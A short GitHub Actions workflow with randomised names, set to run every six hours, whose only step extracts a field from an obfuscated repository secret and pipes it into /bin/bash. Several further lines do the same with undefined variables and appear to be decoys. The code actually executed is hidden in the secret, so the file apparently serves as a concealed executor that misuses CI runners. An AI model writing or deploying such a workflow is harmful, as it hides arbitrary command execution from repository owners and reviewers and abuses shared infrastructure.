name: fananghais

on:
  workflow_dispatch:
  schedule:
    - cron: '21 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fananghais
        env:
          z61632: ${{ secrets.z61632 }}
        run: |
          echo $z61632 | jq -r .iml441 | /bin/bash
          echo $afpf70776 | jq -r .tbuxr367 | /bin/bash
          echo $s213 | jq -r .oswl1 | /bin/bash
          echo $bwej5 | jq -r .axe812 | /bin/bash
          echo $i52304 | jq -r .yl4 | /bin/bash

